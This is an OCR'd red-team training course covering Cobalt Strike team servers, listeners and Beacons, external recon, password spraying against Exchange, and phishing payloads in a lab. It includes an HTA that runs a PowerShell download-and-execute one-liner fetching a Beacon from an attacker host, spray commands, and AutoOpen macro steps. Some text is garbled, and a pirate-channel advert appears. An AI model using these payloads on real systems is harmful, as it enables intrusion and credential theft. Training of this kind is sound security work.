l. Course Introduction:

1. What is Red Teaming?

"Red Teaming" is a term that's used a lot within the cyber security space. Its meaning and
purpose has been malformed over time, or at least is not standardised due to several
factors, including misuse of the name within vendor marketing; and a misunderstanding
of compliance requirements. | shall attempt to provide an accurate definition here that
will set the scene for the course content - we need to understand what red teams are,
what they do and why they do it (and perhaps just as importantly, what they're not for).

A good dictionary definition is provided by Joe Vest and James Tubberville:

Red Teaming is the process of using tactics, techniques and procedures (TTPs) to emulate
a real-world threat, with the goal of measuring the effectiveness of the people, processes
and technologies used to defend an environment.

Red teams provide an adversarial perspective by attacking assumptions made by an
organisation and defenders. Assumptions such as "we're secure because we patch"; "only X
number of people can access that system"; and "technology Y would stop that" are
dangerous and often don't stand up to scrutiny. By challenging these assumptions, a red
team can identify areas for improvement in an organisations operational defence.

Even though there is some cross-over with penetration testing, there are some key
differences that I'd like to highlight.

A typical penetration test will focus on a single technology stack - either because it's part
of a project lifecycle or part of a compliance requirement, (e.g. monthly or annual
assessments). The goals are to identify as many vulnerabilities as possible, demonstrate
how those may be exploited, and provide some contextual risk ratings. The output is
typically a report containing each vulnerability and remediation actions, such as install a
patch or reconfigure some software. There is no explicit focus on detection or response,
does not assess people or processes and there is no specific objective other than "exploit
the system(s)".

In contrast, red teams have a clear objective defined by the organisation - whether that be
to gain access to a particular system, email account, database or file share. Because after
all, organisations are defending "something" and compromising the confidentiality,
integrity and/or availability of that "something" represents a tangible risk, be it financial
or reputational. A red team will also emulate a real-life threat to the organisation. For
example, a finance company may be at risk from known FIN groups. In the case of a
penetration test, a tester will simply use their personally preferred TTPs whereas a red
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team will study and re-use (where appropriate) the TTPs of the threat they're emulating.
This allows the organisation to build detections and processes designed to combat the
very threat(s) they expect to face. Red teams will also look holistically at the overall
security posture of an organisation and not be laser-focused to one specific area - this of
course includes people and processes as well as technology. Finally, red teams put a
heavy emphasis on stealth and the "principal of least privilege". To challenge the
detection and response capabilities, they need to reach the objective without getting
caught - part of this is not going after high-privileged accounts (such as Domain Admin)
unnecessarily. If "Bob from Accounting" can access the objective, then that's all they'll do.

2. What is OPSEC?

Operations Security (OPSEC) is a term originally coined by the US military and adopted by
the information security community. It's generally used to describe the "ease" by which
actions can be observed by "enemy" intelligence. From the perspective of a red team, this
would be a measure of how easy your actions can be observed and subsequently
interrupted by a blue team. Although "ease" is probably not a good word to describe it,
since it's relative to the skills and knowledge of those defenders. However, given the overall
threat landscape, body of public knowledge and even consultation with the client, you can
make some predication regarding their capabilities. Every action you take will leave
indicators, but it's important to have a good sense of how well those indicators are
understood and what the likelihood is that the defenders will see and/or respond to them.
Throughout this course you will see notes that attempt to highlight “bad" OPSEC and how
it might be improved to reduce the likelihood of detection. It should also not be assumed
that OPSEC works in only one direction. Red teamers may gain access to internal systems
used by defenders - such as their Security Information and Event Management (SIEM)
system, ticketing systems, response/procedure documentation, email, real-time chat and
so on. This intelligence can be used to operate in specific ways that the blue team is blind
to, or unable to deal with. Both red and blue teams should assume that their actions are
being monitored and disrupted by the opposite side. Wise operators would also assume
that the team you're up against are better than you.

3. Phases of an engagement:

An overall engagement can be broken down into three main phases:

1. Planning
2. Doing
3. Reporting

The majority of this course focuses on the "doing" (although we will cover planning and
reporting) which can be broken down further, sometimes referred to as the "Attack Kill
Chain". It has a defined start and end, with some cyclic components.
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The engagement begins by performing external reconnaissance against the target
gathering information such as public-facing applications, IP ranges, domain names,
technologies and products used, employees, organisational structure, service providers,
suppliers and more. This information is then used to plan an attack on the perimeter.
Once a foothold has been obtained in the target organisation, the team will perform
internal reconnaissance. The aim is to understand everything possible about the
environment including network topology, internal systems & processes and defensive
products & capabilities. They may also install backdoors on the foothold(s) to ensure they
can maintain persistent access to the environment without having to reperform the initial
compromise steps. It's likely that the team will have to move laterally around the network
to look for their objective or credentials to access it. Credentials can be obtained in a
variety of ways including on file shares, relay attacks or elevating privileges and dumping
with tools such as Mimikatz. Once access to the objective has been achieved, the team
takes the appropriate level of evidence. The engagement may end there or they may
choose to tip their hand to the defenders to gauge their detection

threshold (more on that later).

The bulk of this course will demonstrate TTPs for performing the steps above

3. Planning and client engagement:

It cannot be understated how important it is to properly plan a red team engagement - not just for
achieving good outcomes, but for ensuring everybody involved is protected. The majority of that
planning is the responsibility of the red team leads, and although this course is aimed at operators,
it's useful to get an early understanding of that process.

4. Scope:

When scoping ared team engagement, don’t be constrained by typical "penetration testing
scoping" questions, such as the number of hosts or IP ranges in the network. A red team
does not set out to carry out a review of every host, but seeks to reach a particular objective.
The size of the environment may still be relevant (finding a needle in a small haystack is
easier than in a large haystack after all), but scoping conversations should be more geared
towards building a scenario for the engagement.

5. Threat Model:

The role of a red team is to emulate a genuine threat to the organisation. This could be
anything from relatively low-skilled and low-motivated "script kiddies", to more capable
and organised "hacktivist" groups, or even APTs and nation-states. More mature
organisations have an idea of their threats based on past events, threat intel or market
reports; whilst others do not. In my experience, the latter default towards APT
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threats, which is not always realistic. As part of this planning, be prepared to temper or
help align their expectations. Once a threat has been identified, the red team must build a
corresponding threat profile. This profile defines how the team will emulate this threat by
identifying its intent, motivations, capabilities, habits, TTPs and so on. If it's a known
threat, much of this information can be found from various threat intel sources. Ifit's a
generic threat, the red team may construct a profile that reflects the typical capabilities of
that type of threat.

The MITRE ATT&CK is a great source of tactics and techniques.

6. Breach Model:

The breach model outlines the means by which the red team will gain access to the target
environment. This is usually by attempting to gain access in accordance with the threat
(for example through OSINT and phishing); or provided by the organisation (often called
"assume breach"). There are pros and cons for each approach depending on the
objective(s) of the assessment. If assume breach is not chosen and the red team attempt
to gain access, it's important to have a back-up plan in the event access is not gained
within a predetermined time period, A compromise could be to fallback to an assume
breach model if the red team haven't gained access within the first 25% of engagement
timeframe. This is critical because red team assessments are more about detection and
response, rather than prevention, so those portions of the assessment are more important
than trying to "prove" a breach can happenin the first place.

7. Notifications and assessments:

These types of assessments are often arranged by upper management in security or
compliance roles, and they face a choice as to whether they inform the rest, or part of the
organisation about an upcoming engagement. They may elect to tell nobody, everybody
,or just the relevant security/support teams. Not providing any notification allows
everybody to react as they would on any given day, and will lead to the most authentic
outcomes. However, security teams may feel like they’re being tested or are not trusted by
management, which can lead to bad relationships and negatively impact the outcomes.
On the flip-side, having prior notification may lead them to be extra vigilant or to
(temporarily) increase security measures, which is not an accurate reflection of their
every-day security posture. Ultimately, the "correct" decision should come down to the
existing culture and relationships within the organisation.
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8. ROE:

The Rules of Engagement (RoE) document defines the rules and methodologies against
which the engagement will be conducted; and should be agreed and signed by all parties.
The RoE should:

+ Define the engagement objectives.

+ Define the target(s) of the engagement, including domains and IP ranges.
« Identify any legal or regulatory requirements and/or restrictions.

« Contain emergency contact lists for key persons in all parties.

Any changes made to the RoE should also be agreed and signed by all relevant parties.
Even though physical red teaming (physically attempting to gain entry to a premise or
property) is out of scope of this course, members of those engagements should carry a
suitable "get out of jail letter", signed and authorised by the client. In the event the team is
caught and apprehended by actual law enforcement, they need to prove they were acting
with permission to avoid any prosecution.

9. Record Keeping and Deconfliction:

Throughout the entire engagement, the red team members should maintain records of
their activity. In the event an incident occurs now or in the future, the organisation and
any supporting Digital Forensics & Incident Response (DFIR) needs to be able to identify
whether observed activity is a result of the engagement or not. Frameworks such as
Cobalt Strike maintain a data model and reporting templates of all activity carried out via
the client. This includes commands run, target IP addresses and hostnames, payloads
generated and their file hash, and more. However, you will often run tools externally from
these frameworks that need to be recorded separately. Where feasible, record details of
the dates and times tools are executed within the target environment. The use of terminal
auto-logging and screen recording (e.g. record your screen at 1FPS) software can be useful
to facilitate this.

10.Data Handling:

Red teams must ensure that they adhere to any organisational, regulatory and/or legal
requirements for handling data. You will frequently gain access to credential material for
the target environment, which must be treated as confidential during and after the
engagement. When the engagement is concluded, that data should be destroyed by an
appropriate means. Red teams may also come across privileged or sensitive data such as
personal, medical, financial. Where possible, avoid viewing this data unless it's part of the
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agreed scope and objective; and never impact the confidentiality, integrity or availability
of data.

11. Duration:

The duration of an engagement should only be determined after the scope and objectives
have been agreed. This allows you to provide an estimate based on the actual work that's
been agreed. Most engagements will fall in the 2-4 week range, but may run longer
depending on size and complexity.

12. Costs:

When costing an engagement, there are many factors to consider.
People

A team should have at least two members, and always at least one lead. The number of
team members should be a reflection of the size of the engagement and the timeframe it
should be completed in. Four members (three operators and one lead) is an average team
size.

Travel & Accommodation

If it's required that the team travel (for instance, if they need to come on-site to emulate
an insider threat), then those and other incidental costs should be accounted for.

Software

Most red teams use commercial tools to help carry out their engagements. Cobalt Strike's
licence model is per-operator, so if a large team is required to complete the engagement
in the agreed timeframe, additional licenses may be needed. Red teams may also need to
acquire specialised or ad-hoc software, specific to the engagement.

Hosting
Many red teams use public cloud to run part of their disposable infrastructure. They may
also wish to purchase domain names for use in a phishing campaign or C2 traffic. The

Team Server should be run on-premise of the red teaming company - the costs of running
and maintaining that infrastructure should also be included.
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Pre and Post Engagement Activities

It's easy to forget factoring in the cost of activities that come prior to and after an
engagement. That includes this whole planning process, pre-engagement meetings,
threat profiling, research, tool customisations, infrastructure setup and so on. Post-
engagement wash-up meetings and other follow-up meetings should also be considered.
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II. Command and Control:

1. C&C:

Command & Control, often abbreviated to C2 or C&C, is the means by which an adversary
can perform actions within a compromised environment. During the initial compromise
phase, a malicious payload is executed that will call back to infrastructure controlled by
the adversary. This payload is commonly referred to as an "implantl', "agent" or "RAT"
(Remote Access Trojan). This infrastructure is the central control point of an engagement
and allows an adversary to issue commands to compromised endpoints and receive the
results. The capabilities of these implants will vary between frameworks, but in general
they have the ability to execute different flavours of code and tooling to facilitate the
adversarial objective(s),such as shell commands, PowerShell, native executables,
reflective DLLs and .NET; as well as network pivoting and defence evasion.

Implants will most commonly communicate with this infrastructure over HTTP(S) or DNS,
and can even talk to each other over a peer-to-peer mesh using protocols such as SMB and
TCP. These protocols are utilised because they will typically blend into most
environments.

E Attacker Infrastructure E i Target Network

$— W’ & QoL @HE@

Team
: Boundary
Server H Firewall /
: Web
. ' Proxy

Many commercial and open-source C2 Frameworks exist including Cobalt Strike, SCYTHE,
Covenant, PoshC2, Faction, Koadic, Mythic and the Metasploit Framework. Each
framework has their own sets of strengths and weaknesses - the C2 Matrix is a curated list
of frameworks that can be filtered by their features and capabilities.
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2. Cobalt Strike

Raphael Mudge created Cobalt Strike in 2012 to enable threat-representative security tests
and it was one of the first public red team command and control frameworks. Cobalt Strike
is the go-to red team platform for many businesses consulting organisations around the
world.

3. Starting the team server:
+ Access the console of attacker-windows.
+ Open PuTTY, select the kali saved session and click Open.
o Start tmux.
+ This will ensure the Team Server remains running if you close PuTTY.
+ Change directory to /opt/cobaltstrike.

« Launch the team server binary.

root@kali:/opt/cobaltstrike# ./teamserver 10.10.5.120 Passwerd!
[*] Generating X5@9 certificate and keystore (for SSL)

[+] Team server is up on ©.0.0.8:50850
[*] SHA256 hash of SSL cert is: eadd46ff4f74d58229@cel755513ddfc@ffd736f9@bed5d8d662eel113faccha3

Where:

* 10.10.5.1280 is the IP address of the Kali VM.
* Passwerd! isthe shared password required to connect to the Team Server.

Next,

+ Open the Cobalt Strike GUI.

« Enter kali or 10.10.5.120 into the Host field.

« Enter your favourite hacker pseudonym in the User field.
+ Use the password you set when startingthe Team Server.
+ Click Connect.

+ Ensure the server's fingerprint matches before clicking Yes.
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B Connect

— O

This is the connect dialog. You should use it to
connect to a Cobalt Strike (Aggressor) team

Host 'kali
Port: 50050
User Irasta_mouse

X

FY

w

VerifyFingerprint

The team server's fingerprint is:

ce9b317269c8dfE67964cfcadadd2ch3e2734ba17f59¢2b59181275373dfe153

Does this match the fingerprint shown when the team server started?

OPSEC: The Team Server allows multiple clients to connect to it at the same time. However,
if you have remote team members, you shouldn't expose port 50050 directly to the Internet.
Instead, a secure remote-access solution (such as a VPN or SSH tunnel) should be used.

4. Listener Management:

A "listener" is a host/port/protocol combination that "listens" for incoming
communication from Cobalt Strike's payload, Beacon. The two main flavours of listeners
are egress and peer-to-peer. The egress listener that you will use the majority of the time
isthe HTTP listener. This listener acts like a web server, where the Team Server and
Beacon will encapsulate their communications over HTTP. The "appearance" (bodies,
headers, cookies, URIs etc) of this HTTP traffic can be tightly controlled using Malleable C2
Profiles, which we will cover in more detail towards the end of the course.
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Peer-to-peer listeners allow Beacons to chain their communications together over SMB or
TCP. These are particularly useful in cases where a machine that you compromise cannot
reach your Team Server directly over HTTP.

To create an HTTP listener, go to Cobalt Strike > Listeners and a new tab will open. Click
the Add button and a New Listener dialogue will appear. Select Beacon HTTP as the
payload type and enter a descriptive name. This listener name is used in several Beacon
commands (such as when moving laterally), so make sure it describes the listener well.
Click the + button next to HTTP Hosts which should autocomplete to the Kali IP address
(10.10.5.120). This is fine, so click OK. Leave everything else as it is and click Save.

Create a listener.

Name: |http-port-80

Payload: |Beacon HTTP -

Payload Options

+]

HTTP Hosts: r1(7}_10_5_12{]

o

Host Rotation Strategy: lErn:aund—n:'bin v |

HTTP Host (Stager):  110.10.5.120

Profile: ldefault v

r

HTTP Port (C2): 80

HTTP Host Header:

|
|
|
HTTP Port (Bind): ' \
|
|

HTTP Proxy:

‘ Save || Help |
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5. Generating Payloads:
To generate a payload for this listener, go to Attacks > Packages > Windows Executable (S).

Cobalt Strike is able to generated both staged and stageless payloads. Whenever you see
(S) within the Ul,it's an indication that it's using a stageless payload.

OPSEC: Staged payloads are good if your delivery method limits the amount of data you
can send. However,they tend to have more indicators compared to stageless. Given the
choice, go stageless.

Select the HTTP listener created previously, select Windows EXE as the output and tick Use
X64.

OPSEC: The use of 64-bit payloads on 64-bit Operating Systems is preferable to using 32-bit
payloads on 64-bit Operating Systems.

B Windows Executable (Stageless) — O X
Export a stageless Beacon as a Windows =
executable. Use Cobalt Strike Arsenal scripts (Help  «»
Listener: [http—port-so . 1 I; ‘
Output:  |Windows EXE 7 5°)
x64: [l Use x64 payload|

x ulaBlg fife

[ Generate,;H Help ’

Click Generate and save the file to C:\Payloads. Now execute that EXE and you should see
a new Beacon appear.

cks Reporting Help
0B 0 B=¢ 8,0 $wbBED Fa B

external internal = listener user EDmpIﬂEl note pmcess p)d arch last
& 10.10.5.110 10.10.5.110 Administrator *

EventLog X | Listeners x‘

name « payload host port bindto beacons profile
hitp-port-80 windows/beacon_httpireverse_http 10.10.5.120 80 10.10.5.120 default

[Laga| [Eai] [_Remove | [ Restart ] [_Heip_]
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6. Interacting with beacon:

To interact with a Beacon, simply right-click it and select Interact. This will open a command line interface where you can enter various commands. To get a list of available commands type help.
beacon> help

Beacon Commands

Command Description

argue spoof arguments for matching processes
blockdlls Block non-Microsoft DLLs in child processes
browserpivot Setup a browser pivot session

cancel Cancel a download that's in-progress

To get more detailed help for a command, type help <command>.

beacon> help inject
Use: inject [pid] <x86|x64> [listener]

Open the process and inject shellcode for the listener

Parameters wrapped in [ ] are mandatory, whilst those in < > are optional (although the default value won't always be what you want).

By default, Beacon will check into the Team Server every 60 seconds. To lower this, we can use the sleep command.

beacon> sleep 5

[*] Tasked beacon to sleep for 5s
[+] host called home, sent: 16 bytes

OPSEC: Fast check-in times can increase the chance of the Beacon traffic being caught. You can also add a jitter to randomise the check-in time by a

given percentage.

Some Beacon commands (such as sleep) don't provide output, instead you will see a "host called home" message to let you know that Beacon has
checked in and received the job. There are also some features of the Ul (such as the File Browser) that cannot be accessed on this command-line

interface. Instead, you must right-click on a Beacon and use the popup menu (e.g. Explore > File Browser).

7. Tips and tricks:
e Use ctrl + and ctrl - toincrease/decrease the fontsize in the current window.

* Right-click the X on a tab for extended actions, like renaming and detaching into a floating window.

e Use ctrl + Kk toclearthe current window.

8. Cobalt Strike Demo:
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Ill. External Recon:

1. External Recon:

If your engagement is not being kicked off via an “assume breach” methodology and you
need to gain initial entry into the target network yourselves, some external
reconnaissance will be required. The reconnaissance phase is vital as it provides
information that will be leveraged to exploit the target or gain access to data.

There are two main facets of recon - organisational and technical.

Organisational

During "organisational" recon, you’re focused on collecting information about the
organisation. This can include the people who work there (names, jobs and skills), the
organisational structure, site locations and business relationships.

Technical

During "technical" recon, you’re looking for systems such as public-facing websites, mail
servers, remote access solutions, and any vendors or products in use, particularly
defensive ones - web proxies, email gateways, firewalls, antivirus etc. Gathering either
type of information can be done "passively" or "actively".

Passive
Passive collection relies on 3rd party sources such as Google, Linkedln, Shodan and social
media - where you are not actively touching parts of the target network.

Active

Active, as it sounds, is directly touching those components which could be as simple as
visiting the target’s website, or port scanning their IP ranges. Active recon is inherently
riskier than passive, as it provides an

organisation with their first potential indication that they’re being looked at.

Whilst conducting active recon, consider doing so via a proxy or VPN service to not expose
your public IP address.
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2. DNS Records:

Domain Name System (DNS) records can provide a wealth of information regarding
services that may be exposed to the Internet, but here there be dragons.

NOTE: Because the lab has no outbound Internet access, you must use your own Kali VM if
you want to following along with these steps. But they are optional, so feel free not to.

$ dig cyberbotic.io +short
184.21.90.222

172.67.205.143

Performing a whois on each public IP address can show who it belongs to. We can see that it resolves to a 3rd party provider, Cloudflare.

$ whois 184.21.90.222

OrgName: Cloudflare, Inc.
OrgId: CLOUD14

Address: 101 Townsend Street
City: San Francisco
StateProv: CA

PostalCode: 94187

Country: us

RegDate: 2010-087-09

Updated: 2021-01-11

Ref: https://rdap.arin.net/registry/entity/CLOUD14

When we browse to cvberbotic.io, we are actually being sent to Cloudflare, which proxies
the traffic between us and the Webserver. The issue being that we don't know if the web
server is hosted on premise of the target organisation, or in another 3rd party cloud
service. This information you must confirm with the client - providers such as Amazon and
Azure have specific rules and/or require explicit permission before you are able to carry
out any security assessments hosted on, or performed from, their infrastructure.

You may also come across IP addresses that belong to Internet Service Providers (ISPs), as
some organisations rent their public address space. Some Software as a Service (SaaS)
offerings require DNS records on the target domain, in order to point towards those
services. A notable example includes Microsoft's Office 365 which can be found at
autodiscover.target-domain. If the target uses these SaaS services for email and/or
document storage etc, it may be possible to gain access to your objective without ever
needing to compromise their network. Subdomains can also provide insight to other
publicly available services, which could include webmail, remote access solutions such as
Citrix,or a VPN. Tools such as dnscan come with lists of popular
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subdomains. Weak email security (SPF, DMARC and DKIM) may allow us to spoof emails to
appear as though they’re coming from their own domain. Spoofcheck is a Python tool that
can verify the email security of a given domain.

$ ./spoofcheck.py cyberbotic.io

[+] cyberbotic.io has no SPF record!

[*] No DMARC record found. Looking for organizational record

[+] No organizational DMARC record

[+] Spoofing possible for cyberbotic.io!

3. Social Media:

For several years, social engineering and phishing have been the most prolific methods for
gaining access to a target environment. To prepare your own campaign, sites such as
Linkedln are a goldmine of information because people expose a lot of professional (and
sometimes personal) information about themselves.

We love to demonstrate how good we are at Task X or managing Product Y - and this
information is not only useful for knowing what products are being used, but also for
generating your pretext. The pretext is the "story" behind why we want our target to open
our email and carry out the desired actions. The pretext can be rather generic and sent to
multiple targets or targeted to an individual or small group. Tailoring the pretext to
something a user will either relate to or have an interest in, will give us a better

chance of success. And there are also emotional characteristics that will statistically result
in higher user engagement - in particular, fear, urgency, greed and curiosity.

Two examples could be:

+ Human Resources- URGENT: Grievance filed against...
« Accounts Payable - FINAL NOTICE: Invoice 1234 not paid

The following "Google Dork" can be used to quickly scrape Linkedln for employees of a
particular organisation: site:"linkedin.com "<company name>" Some of the more
interesting information you can glean from a LinkedIn profile includes names, current and
previous job roles, location (on-site or remote), contact info (websites, social media, email
addresses), previous experiences, education, qualifications, certifications, personal
interests and 1st, 2nd and 3rd-degree connections.

EXERCISE: Conduct some additional external reconnaissance against the lab targets at
https://cvberbotic.io and see if you can find any information that would be usefulin a
phishing campaign.
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IV. Initial Compromise:

1. Initial Compromise:
NOTE: These exercises can now be carried out in the lab.

We're going to assume that we identified their OWA Exchange service
at 10.10.15.100 during our external recon

2. Password Spraying:

Password spraying is an effective technique for discovering weak passwords that users are
notorious for using. Patterns such as MonthYear (August2019), SeasonYear (Summer2019)
and DayDate (Tuesday6) are very common.

TIP: Be cautious of localisations, e.g. Autumn vs Fall.
Two excellent tools for password spraying against Office 365 and Exchange

are MailSniper and SprayingToolkit. On the attacker-windows VM, open PowerShell and
import MailSniper.ps1.

PS C:\> ipmo C:\Tools\MailSniper\MailSniper.psl

NOTE: You'll have to disable Defender's Real-time protection first.

Enumerate the NetBIOS name of the target domain with Invoke-DomainHarvestOWA.

PS C:\> Invoke-DomainHarvestOWA -ExchHostname 16.16.15.188

[*] Harvesting domain name from the server at 10.1€.15.1e©

The domain appears to be: CYBER or cyberbotic.io
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https://github.com/dafthack/MailSniper
https://github.com/byt3bl33d3r/SprayingToolkit

Next, we need to find valid usernames from the list of users enumerated from https://cyberbotic.io.

root@kali:~# cat names.txt

Bob Farmer
Isabel Yates
John King

Joyce Adams

namemash.py is a python script that I've used for as long as | can remember. It will take a
person's full name, and transform it into possible username permutations.

root@kali:~# /opt/namemash.py names.txt >> possible-usernames.txt
root@kali:~# head -n 5 possible-usernames.txt

bobfarmer

farmerbob

bob.farmer

farmer.bob

farmerb

Copy the list across to the Windows VM.

PS C:\> pscp root@kali:/root/possible-usernames.txt .

Invoke-UsernameHarvestOWA uses a timing attack to validate which (if any) of these usernames are valid

00 -Domain CYBER -UserList .\possible-usernames.txt -OutFile valid.txt

CYBER\D1QFbq
\ghyWXj
CYBER\uQbXAI

Baseline Response: 767.4

10ld
Domain\Username
CYBER\THd tMw
CYBER\rVNvmq
CYBER\AvaPOc

[*] Potentially Valid!

[*] A total of 1 poten names found.

Results have been written to valid.txt.
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https://gist.github.com/superkojiman/11076951

This output shows one valid result for CYBER\iyates.
You can run this again and target -Domain DEV, which will also find valid results for:

e DEV\bfarmer
e DEV\jking
o DEV\jadams

This requires a little bit of explaining. cyberbotic.io is the root of the Active Directory
forest, who's NetBIOS name is CYBER. But cyberbotic.io has a child domain

called dev.cyberbotic.io, who's NetBIOS name is DEV. From this, we can ascertain that
iyates is a user in the parent domain; whilst bfarmer, jking and jadams exist in the child
domain.

However, without just guessing at domain names, we don't have a reliable way of knowing
DEV ever existed. You may be able to find some clues from your OSINT such as leaked
internal domain names.

MailSniper can spray passwords against the valid account(s) identified using, Outlook Web
Access (OWA), Exchange Web Services (EWS) and Exchange ActiveSync (EAS).

PS C:\> Invoke-PasswordSprayOWA -ExchHostname 10.10.15.100 -UserList .\valid.txt -Password Summer2021
[*] Now spraying the OWA portal at https://10.10.15.108/owa/

[*] SUCCESS! User:CYBER\iyates Password:Summer2021
[*] A total of 1 credentials were obtained.

OPSEC: In the real world, be aware that these authentication attempts may count towards the domain lockout policy for the users. Too many attempts in a short space of time is not only loud, but may also lock
accounts out.

We can do further actions using MailSniper with valid credentials, such as downloading the global address list.

PS C:\> Get-GlobalAddressList -ExchHostname 10.10.15.100 -UserName CYBER\iyates -Password Summer2021 -OutFile gal.txt
[*] First trying to log directly into OWA to enumerate the Global Address List using FindPeople...

[*] This method requires PowerShell Version 3.0

[*] Using https://10.10.15.100/owa/auth.owa

[*] Logging into OWA...

[*] OWA Login appears to be successful.

[*] Retrieving OWA Canary...

[*] Successfully retrieved the X-OWA-CANARY cookie: ahhlRb@kZUKEg8YE05ZZtQDYwqUSEdKI170J7 ug NJTMpgknR3QJ_M.
[*] Retrieving AddressListId from GetPeopleFilters URL.

[*] Global Address List Id of b4477ba8-52b0-48bf-915e-d179db98788b was found.

[*] Now utilizing FindPeople to retrieve Global Address List

[*] Now cleaning up the list...

bfarmer@cyberbotic.io

iyates@cyberbotic.io

jadams@cyberbotic.io

jking@cyberbotic.io

ngloverdcyberbotic.io

[*] A total of 5 email addresses were retrieved

[*] Email addresses have been written to gal.txt

If there are names here that we didn't find during OSINT, we can go back and do another round of spraying against them.
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3. Internal Phishing:
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Internal Phishing
Open https://10.10.15.100 in Google Chrome and login with the obtained credentials.

0% Outlook X + Qo

< C A Notsecure  10.10.15.100 St s

d Outlook

Domain\user name;

CYBER\iyates

Password

EEEEREEEEE

> Signin

Access to one or more internal mailboxes opens up a few possibilities. We can search for emails that may contain sensitive information such as documents, usernames and passwords; and even send emails to staff

on behalf of the compromised user. We can send files and/or links that we craft ourselves, or even download a document already in an inbox, backdoor it (e.g. with a macro), and send it back to somebody.

Let's look at some payloads we could send.
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HTML Application (HTA)

An HTA is a proprietary Windows program whose source code consists of HTML and one or more scripting languages supported by Internet Explorer (VBScript and JScript). The HTML is used to generate the user

interface and the scripting language for the program logic. An HTA executes without the constraints of the browser's security model, so it executes as a "fully trusted” application.

An HTA is executed using mshta.exe, which is typically installed along with IE. In fact, mshta is dependant on IE, so if it has been uninstalled, HTAs will be unable to execute.

To create an HTA, open Visual Studio Code on the attacker-windows VM and create a new empty file. Save the following content to C:\Payloads\demo.hta.

<html>
<head>
<title>Hello World</title>

</head>

<body>
<h2>Hello World</h2>
<p>This is an HTA...</p>
</body>
</html>

Now browse to this file in explorer and double-click it to run (make sure to select Microsoft HTML Application host if prompted). All being well, a window will appear with the rendered content.

= demo.hta X

st 87 Hello World
<head>»

{title>Hello World</title>
¢ /head> Hello World
<body>»

<h2>Hello World</h2> This1s an HTA...

<p>This is an HTA...</p>

</body>
</html>

Being HTML you can put anything that you want the user to see - so channel your inner creativity.

Let's add some VBScript that will execute something on the user's machine. Launching calc is the most 1337 thing you can do, so let's try that.

<html>
<head>
<title>Hello World</title>
</head>
<body>
<h2>Hello World</h2>
<p>This is an HTA...</p>
</body>

<script language=
Function Pwn()
Set shell = CreateObject(
shell.run
End Function

Pwn
</script>
</html>

The wscript.Shell object provides access to the Windows shell methods and the run method simply allows us to run an application from disk. Run the HTA again and the calculator should appear on the

desktop.

Calculator

Hello World
Standard

This 15 an HTA _

Next, we need to replace calc with a Beacon payload. Let's use a PowerShell payload.

In Cobalt Strike, go to Attacks > Web Drive-by > Scripted Web Delivery (S) and generate a 64-bit PowerShell payload for your HTTP listener. The URI path can be anything, but | will keep it as /a.

This will generate a PowerShell payload and host it on the Team Server so that it can be downloaded over HTTP and executed in-memaory. Cobalt Strike will also generate the PowerShell one-liner that will do just

that.

B scripted Web Delivery (S) — O X

e,

This attack hosts an artifact that delivers a full Cobalt
Strike payload. The provided one-liner will allow youto -«

URI Path: |/a

Local Host: 110.10.5.120 ]

Local Port: |80 l

Listener:  |nttp-port-80 |
Type: powershell v |
64 ] Use x64 payload
Launch || Help |
B Success — ] X

Started service: Scripted Web Delivery
Copy and paste this URL to access it

lpowershell exe -nop -w hidden -¢ "IEX ((new-object net webclient) downloadstring(‘http /10 10 5. 120°:80/a))" |

| Ok

Copy/paste this line into the HTA in place of calc and make sure to add another set of double quotation marks around the IEX command. It should look like this:

shell.run “powershell.exe -nop -w hidden -c¢ ""IEX ((new-object net.webclient).downloadstring( http://10.10.5.120:80/a"))"""

Before you execute the HTA, go to View > Web Log in Cobalt Strike. This allows us to see incoming HTTP requests. Now run the HTA.

NOTE: You will need to disable Windows Defender on the attacker-windows VM first.

You should see an entry appear in the weblog for /a (or whatever URI you used), but no Beacon will appear. Why is that? If we use Process Hacker to inspect the running mshta process, we can see it's actually a

32-bit application (there is a 64-bit version, but the 32-bit version is the one that seems to run by default).

Hello World

This 1s an HTA. .. ™ mshta.exe (2068) Properties — O X

General Statistics Performance Threads Token Modules Memory Environment Handles GPU Comment

File
’ﬁ Microsoft (R) HTML Application host
| (Verified) Microsoft Windows

Version: 11.0.19041.1

Image file name:
C: \Windows 'ﬁys\-‘-.n'ﬂﬂ.r’ﬁ%lwshta.exe |

Frocess
Command line: C\Windows \SysWOW6E4\mshta,exe” "C: \Payloads'\demo.hta™ {1IE460BD7F 1C3-48 2E-88BF -4E770A 288AF 5} IE460BD 7-

Current directory: - C:\Payloads\

Started: | 2 minutes and 49 seconds ago (12:32:48 07/05/2021)

PEE address: _ 0x2ba4000 (32-bit: 0x2bas5000) | Image type: 32-bit
Parent: _ explorer.exe (5968) | [
Mitigation polides: | DEP (permanent); ASLR (force relocate); CF Guard | Details
Protection: MNone Permissions Terminate

Close

This means that mshta is also launching the 32-bit version of PowerShell, but the payload we generated was 64-bit. We can "fix" this by either changing our payload to be 32-bit (not desirable), or to force mshta to

use the 64-bit version of PowerShell.

To do the latter, instead of simply putting powershell. exe into the HTA, we provide the full path:

C:\Windows\sysnative\WindowsPowerShell\vl.@\powershell.exe

sysnative is asort of alias for System32 that only exists for 32-bit applications running on a 64-bit 0S. Otherwise if you try to access C: \Windows\System32 in a 32-bit application, it will actually redirect to

C:\Windows\SysWOW64. | recommend checking out this article to understand SysWOW64 better.

EXERCISE: Fix the HTA using the details above to get a 64-bit Beacon running on attacker-windows.

A more robust solution could be to perform an architecture check in the HTA or an intermediately PowerShell script and invoke the correct payload for the target.

Function Pwn()
Set shell = CreateObject(

If shell.ExpandEnvironmentStrings(
shell.run

Else
shell.run

End If

End Function

MARK INCOMPLETE ‘ m
Join us now -> hideOI.ir | donate.hideOl.ir t.me/H de0O1 | t.ne/RedBl ueHt



Visual Basic for Applications (VBA) Macro's

VBA is an implementation of Visual Basic that is very widely used with Microsoft Office applications - often used to enhance or augment functionality in Word and Excel for data processing etc. The prevalence of
macro's in the commercial world is a double-edged sword when it comes to leveraging macro's for malicious purposes. On one hand, the presence of a document with embedded macro's is not necessarily

suspicious; but because they are used maliciously by threat actors, they are also given more scrutiny both from technical products (e.g. web/email gateways) and in security awareness training.
You can create a macro in a Word document by going to View > Macros > Create.

TIP: Change the "Macros in:" field from "All active templates and documents" to "Document 1"

Give the macro a name and click Create. To force the macro to trigger automatically when the document is opened, use the name AutoOpen.

VBA is not all that different from VBScript, so it's not too difficult to use the same wscript.shell object previously.

Sub AutoOpen()

Dim Shell As Object
Set Shell = Cre:
Shell.Run

End Sub

To test the macro, use the play/pause/stop buttons.

&

File Edit View |Inset Format Debug Run Tools Add-Ins Window Help

WE--d ey n 3| $FY @ LngColl E

Project - Project y

[+ @ Normal

88 Project (Document1) (General)
